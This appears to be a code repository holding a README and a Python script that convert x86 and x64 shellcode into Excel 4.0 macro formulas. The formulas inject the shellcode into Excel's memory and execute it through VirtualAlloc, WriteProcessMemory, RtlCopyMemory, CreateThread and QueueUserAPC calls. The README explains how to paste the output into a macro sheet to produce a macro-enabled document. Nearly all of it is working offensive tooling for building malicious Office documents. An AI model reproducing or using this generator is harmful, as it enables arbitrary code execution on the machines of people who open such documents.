├── README.md └── generateExcel4.py /README.md: -------------------------------------------------------------------------------- 1 | # Excel 4.0 Shellcode Macro Generator 2 | 3 | This program takes x86 and x64 shellcode bin files as arguments, converts them them to Excel CHAR shellcode, and adds formulas necessary to inject and execute into memory. (Be sure the bin files have been modified in a way that exclude null bytes). 4 | 5 | If the formula finds Excel is running in a 32 bit process, the x86 shellcode will be executed. Likewise, if Excel is found to be running in a 64 bit process, the x64 shellcode will be executed. 6 | 7 | I could not find a good way to create the 4.0 macro sheet from python, so I have the output to a CSV file instead. You can manually run the macro code from within Excel as a CSV, or if you would like a macro-enabled document, copy and paste the contents to a new XLS/XLSM document in an Excel 4.0 macro sheet. 8 | 9 | By default, outputs to 'output.csv' 10 | 11 | Written for Python 3. 12 | 13 | # Usage 14 | 15 | python excel4macro.py [x86payload.bin] [x64payload.bin] 16 | 17 | # Creating a 4.0 Macro 18 | In an excel sheet, the 4.0 macro option can be found by simply right-clicking on the current sheet and selecting ***Insert -> MS Excel 4.0 Macro.*** 19 | 20 | ![image](https://user-images.githubusercontent.com/51035066/82890713-9b330680-9f1a-11ea-9e0f-c23b4b67bfce.png) 21 | 22 | ![image](https://user-images.githubusercontent.com/51035066/82890736-a423d800-9f1a-11ea-8937-04a98db48cc3.png) 23 | 24 | ![image](https://user-images.githubusercontent.com/51035066/82890763-ac7c1300-9f1a-11ea-91df-ba41c9fcde99.png) 25 | -------------------------------------------------------------------------------- /generateExcel4.py: -------------------------------------------------------------------------------- 1 | from openpyxl import Workbook, load_workbook 2 | from itertools import zip_longest 3 | import argparse 4 | import sys 5 | import codecs 6 | import csv 7 | 8 | parser = argparse.ArgumentParser(description='Creates CSV with Excel 4.0 Macro code to inject shellcode into memory. Outputs to "output.csv" ') 9 | parser.add_argument('[x86 bin file]', help='the file path for your x86 shellcode file') 10 | parser.add_argument('[x64 bin file]', help='the file path for your x64 shellcode file') 11 | args = parser.parse_args() 12 | 13 | 14 | #Get bin files 15 | bin86 = sys.argv[1] 16 | bin64 = sys.argv[2] 17 | 18 | #Initiate Shellcode Lists 19 | shellcode86 = [] 20 | shellcode64 = [] 21 | 22 | #Convert each byte to base 16 hex for excel. Modified from: 23 | #https://github.com/mdsecactivebreach/SharpShooter/blob/master/modules/excel4.py 24 | def bytes2int(byte): 25 | return int(codecs.encode(byte, ('hex')), 16) 26 | 27 | #Create Shellcode. Modified code from: 28 | #https://github.com/mdsecactivebreach/SharpShooter/blob/master/modules/excel4.py 29 | 30 | def generateShellcode(binfile, arch): 31 | 32 | with open(binfile, 'rb') as sfile: 33 | 34 | i = 0 35 | excelShellcode = '=' 36 | byte = sfile.read(1) 37 | 38 | while byte != b'': 39 | hexByte= str(bytes2int(byte)) 40 | excelShellcode += f'CHAR({hexByte})' 41 | byte = sfile.read(1) 42 | i +=1 43 | 44 | if i == 20: 45 | if arch == 'x86': 46 | shellcode86.append(excelShellcode) 47 | excelShellcode = '=' 48 | elif arch == 'x64': 49 | shellcode64.append(excelShellcode) 50 | excelShellcode = '=' 51 | i = 0 52 | else: 53 | excelShellcode+=('&') 54 | 55 | #Append last line 56 | if arch == 'x64': 57 | shellcode64.append(excelShellcode[:-1]) 58 | 59 | elif arch == 'x86': 60 | shellcode86.append(excelShellcode[:-1]) 61 | 62 | #Generate shellcode lists 63 | generateShellcode(bin86, 'x86') 64 | generateShellcode(bin64, 'x64') 65 | 66 | shellcode86.append('=RETURN()') 67 | shellcode64.append('=RETURN()') 68 | 69 | #Write to excel 70 | #Generate column calues 71 | memory86 = ['=R1C7()', 72 | '=CALL("Kernel32","VirtualAlloc","JJJJJ",0,880,4096,64)', 73 | '=SELECT(R1C7:R1000:C7,R1C7)','=SET.VALUE(R1C1, 0)', 74 | '=WHILE(LEN(ACTIVE.CELL())>0)', 75 | '=CALL("Kernel32","WriteProcessMemory","JJJCJJ",-1, R2C6 + R1C1 * 20,ACTIVE.CELL(), LEN(ACTIVE.CELL()), 0)', 76 | '=SET.VALUE(R1C1, R1C1 + 1)','=SELECT(, "R[1]C")','=NEXT()', 77 | '=CALL("Kernel32","CreateThread","JJJJJJJ",0, 0, R2C6, 0, 0, 0)', 78 | '=WORKBOOK.ACTIVATE("Sheet1")', 79 | '=HALT()'] 80 | 81 | memory64 = ['=R1C3()', 82 | '=CALL("Kernel32","VirtualAlloc","JJJJJ",1342177280,1000,12288,64)', 83 | '=SELECT(R1C3:R1000:C3,R1C3)', 84 | '=SET.VALUE(R1C1, 0)', 85 | '=WHILE(LEN(ACTIVE.CELL())>0)', 86 | '=CALL("kernel32", "RtlCopyMemory", "JJCJ",R2C2 + R1C1 * 20,ACTIVE.CELL(),LEN(ACTIVE.CELL()))', 87 | '=SET.VALUE(R1C1, R1C1 + 1)', 88 | '=SELECT(, "R[1]C")', 89 | '=NEXT()', 90 | '=CALL("Kernel32","QueueUserAPC","JJJJ",R2C2,-2,0)', 91 | '=CALL("ntdll","NtTestAlert","J")', 92 | '=WORKBOOK.ACTIVATE("Sheet1")', 93 | '=HALT()'] 94 | 95 | activateMacro = ['=WORKBOOK.ACTIVATE( "Macro1")', 96 | '=R1C5()'] 97 | 98 | osCheck = ['=ERROR(FALSE, R2C103:R3C103)', 99 | r'C:\Program Files (x86)\Microsoft Office\AppXManifest.xml', 100 | '=FOPEN(R2C5, 2)', 101 | '=IF(ISERROR(R3C5), R1C2(), R1C6())'] 102 | 103 | #Define columns 104 | cols = [[''], memory64, shellcode64, activateMacro, osCheck, memory86, shellcode86] 105 | 106 | exportData = zip_longest(*cols, fillvalue = '') 107 | 108 | #write to output.csv 109 | with open('output.csv', 'w', newline='') as csvfile: 110 | writer = csv.writer(csvfile) 111 | writer.writerows(exportData) 112 | print('Done.') 113 | 114 | --------------------------------------------------------------------------------